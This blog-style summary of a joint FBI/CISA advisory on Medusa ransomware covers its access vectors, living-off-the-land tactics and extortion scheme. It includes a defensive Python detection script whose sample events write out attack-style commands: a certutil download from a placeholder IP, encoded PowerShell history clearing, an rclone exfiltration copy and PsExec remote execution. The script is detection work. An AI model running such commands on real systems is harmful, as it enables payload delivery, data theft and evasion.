Medusa Ransomware Strikes Over 300 Critical Infrastructure Organizations by February 2025

TL;DR

The Medusa ransomware operation has targeted over 300 critical infrastructure organizations in the United States by February 2025. The FBI, CISA, and MS-ISAC issued a joint advisory detailing the tactics, techniques, and indicators of compromise (IOCs) used by Medusa. This ransomware-as-a-service (RaaS) variant employs sophisticated methods, including phishing, exploiting software vulnerabilities, and using legitimate tools for reconnaissance and lateral movement.

Main Content

Medusa Ransomware Targets Critical Infrastructure

The Medusa ransomware operation has impacted over 300 organizations in critical infrastructure sectors in the United States by February 2025. A joint advisory issued by the FBI, CISA, and MS-ISAC details the tactics, techniques, and indicators of compromise (IOCs) based on recent FBI investigations [1].

Overview of Medusa Ransomware

Medusa, a ransomware-as-a-service (RaaS) variant first identified in June 2021, has affected various critical infrastructure sectors, including medical, education, legal, insurance, technology, and manufacturing. The advisory emphasizes that Medusa is distinct from MedusaLocker and Medusa mobile malware variants [2].

Tactics and Techniques

Initial Access and Exploitation

Medusa developers recruit initial access brokers (IABs) through cybercriminal forums, offering payments ranging from $100 to $1 million. The group’s affiliates gain access to victims by running phishing campaigns to steal credentials and by exploiting unpatched software vulnerabilities. Notably, they target:

  • CVE-2024-1709: ScreenConnect authentication bypass [3].
  • CVE-2023-48788: Fortinet EMS SQL injection [4].

Reconnaissance and Lateral Movement

Medusa operators leverage living off the land (LOTL) techniques and legitimate tools like Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance. They scan ports such as FTP, SSH, HTTP, SQL databases, and RDP after gaining a foothold. Network and filesystem enumeration are conducted using PowerShell and Windows Command Prompt. Additionally, operators utilize Windows Management Instrumentation (WMI) to query system information.

Evasion and Data Exfiltration

Medusa actors use LOTL techniques to evade detection, employing certutil.exe for stealthy file ingress. They delete PowerShell command history to cover their tracks and use increasingly complex PowerShell evasion tactics, including base64-encoded commands, obfuscation, and memory-based execution. The operators also attempt to disable security tools by abusing vulnerable or signed drivers. For command and control, the operators rely on Ligolo for reverse tunneling and on Cloudflared to reach compromised systems without exposing them directly to the internet.

Encryption and Extortion

Medusa operators leverage legitimate remote access tools like AnyDesk, Atera, and Splashtop, alongside RDP and PsExec, to move laterally and locate files for exfiltration and encryption. They use PsExec to execute scripts, enable RDP access, and modify firewall rules. Attackers use Mimikatz to steal credentials and Rclone for data exfiltration. Encryption is executed using gaze.exe, which disables security tools, deletes backups, and encrypts files with AES-256 before dropping a ransom note [5].
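The behaviours described in the two paragraphs above (certutil.exe file ingress, base64-encoded PowerShell, command-history deletion, PsExec, network scanners, and Rclone transfers) are all visible in process-creation telemetry. The following triage script is an added example, not code from the advisory or from the original post: it runs simple rules for those behaviours over a handful of constructed process-creation events and decodes any `-EncodedCommand` payload so the analyst sees the real command. The event fields, hostnames, IP addresses, file paths and rule names are assumptions; the patterns are heuristics to be tuned against an environment's own baseline.

```python
import base64
import binascii
import re
from dataclasses import dataclass

# Heuristic patterns for the LOTL behaviours the advisory describes.
CERTUTIL_INGRESS = re.compile(r"(?i)certutil(?:\.exe)?\s.*-(?:urlcache|decode|verifyctl)")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -en, -enc, ...).
ENCODED_COMMAND = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
HISTORY_CLEARING = re.compile(r"(?i)clear-history|consolehost_history|historysavepath")
RCLONE_TRANSFER = re.compile(r"(?i)rclone(?:\.exe)?\s+(?:copy|sync|move)\s")
# Rclone remotes look like "name:path"; two or more characters so drive letters do not match.
REMOTE_ARG = re.compile(r"(?:^|\s)([A-Za-z0-9_-]{2,}):")
RECON_SCANNERS = ("advanced_ip_scanner", "advanced ip scanner", "netscan")
PSEXEC = re.compile(r"(?i)(?:^|\\)psexec(?:64)?(?:\.exe)?(?:\s|$)")


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def ps_encode(script: str) -> str:
    """Encode a script the way PowerShell expects for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if the line carries none."""
    m = ENCODED_COMMAND.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None  # malformed payload: not decodable, so not flagged as encoded PowerShell


def triage(events):
    """Apply every rule to each process-creation event; return all findings."""
    findings = []
    for ev in events:
        host, image, cmd = ev["host"], ev["image"].lower(), ev["cmdline"]
        if CERTUTIL_INGRESS.search(cmd):
            findings.append(Finding(host, "certutil_ingress", cmd))
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append(Finding(host, "encoded_powershell", decoded))
        # Check both the raw line and the decoded payload for history clearing.
        if HISTORY_CLEARING.search(cmd) or (decoded and HISTORY_CLEARING.search(decoded)):
            findings.append(Finding(host, "history_clearing", decoded or cmd))
        if RCLONE_TRANSFER.search(cmd):
            remotes = [r for r in REMOTE_ARG.findall(cmd) if r.lower() not in ("http", "https")]
            findings.append(Finding(host, "rclone_transfer", ", ".join(remotes) or cmd))
        if any(s in image or s in cmd.lower() for s in RECON_SCANNERS):
            findings.append(Finding(host, "recon_scanner", image))
        if PSEXEC.search(image) or PSEXEC.search(cmd):
            findings.append(Finding(host, "psexec", cmd))
    return findings


# Constructed sample events (assumed Sysmon-like fields; hosts, IPs and paths are made up).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://198.51.100.23/update.dat C:\Users\Public\u.dat"},
    {"host": "ws01", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -EncodedCommand " + ps_encode("Clear-History")},
    {"host": "fs02", "image": r"C:\Users\Public\rclone.exe",
     "cmdline": r"rclone.exe copy C:\Finance mega:backup --transfers 8"},
    {"host": "ws03", "image": r"C:\Tools\advanced_ip_scanner.exe",
     "cmdline": "advanced_ip_scanner.exe"},
    {"host": "ws01", "image": r"C:\Tools\PsExec64.exe",
     "cmdline": r"PsExec64.exe \\SRV02 -s cmd.exe"},
    {"host": "ws04", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},  # benign control: should produce no finding
]


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"{f.host:5} {f.rule:20} {f.detail}")
```

Each rule on its own is noisy in some environments (administrators do use PsExec and certutil), so the value is in correlating several findings on one host within a short window and in surfacing the decoded PowerShell rather than the opaque base64 blob.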

Double Extortion Model

Medusa RaaS employs a double extortion model, where victims must pay both to decrypt their files and to prevent the release of stolen data. The ransom note demands that victims make contact within 48 hours via a Tor browser-based live chat or Tox, an end-to-end encrypted instant-messaging platform. If the victim does not respond, Medusa actors reach out directly by phone or email. Medusa operates a .onion data leak site that lists victims alongside countdowns to the release of their data. Ransom demands are posted on the site, with direct hyperlinks to Medusa-affiliated cryptocurrency wallets. Victims can pay $10,000 USD in cryptocurrency to add a day to the countdown timer.

Potential Triple Extortion Scheme

FBI investigations revealed that after paying the ransom, one victim was contacted by a separate Medusa actor who claimed the negotiator had stolen the ransom amount already paid and requested that half of the payment be made again to provide the “true decryptor”, potentially indicating a triple extortion scheme [6].

Conclusion

The Medusa ransomware operation highlights the evolving threat landscape targeting critical infrastructure. Organizations must remain vigilant and implement robust cybersecurity measures to protect against such sophisticated attacks.

Additional Resources

For further insights, check:

References

[1]: FBI, CISA, and MS-ISAC (2025). “Joint Advisory on Medusa Ransomware”. Retrieved 2025-03-13.
[2]: Security Affairs (2025). “Medusa Ransomware Details”. Retrieved 2025-03-13.
[3]: Security Affairs (2025). “CVE-2024-1709”. Retrieved 2025-03-13.
[4]: Security Affairs (2025). “CVE-2023-48788”. Retrieved 2025-03-13.
[5]: MITRE ATT&CK (2025). “T1657”. Retrieved 2025-03-13.
[6]: Security Affairs (2025). “Medusa Ransomware Extortion”. Retrieved 2025-03-13.

This post is licensed under CC BY 4.0 by the author.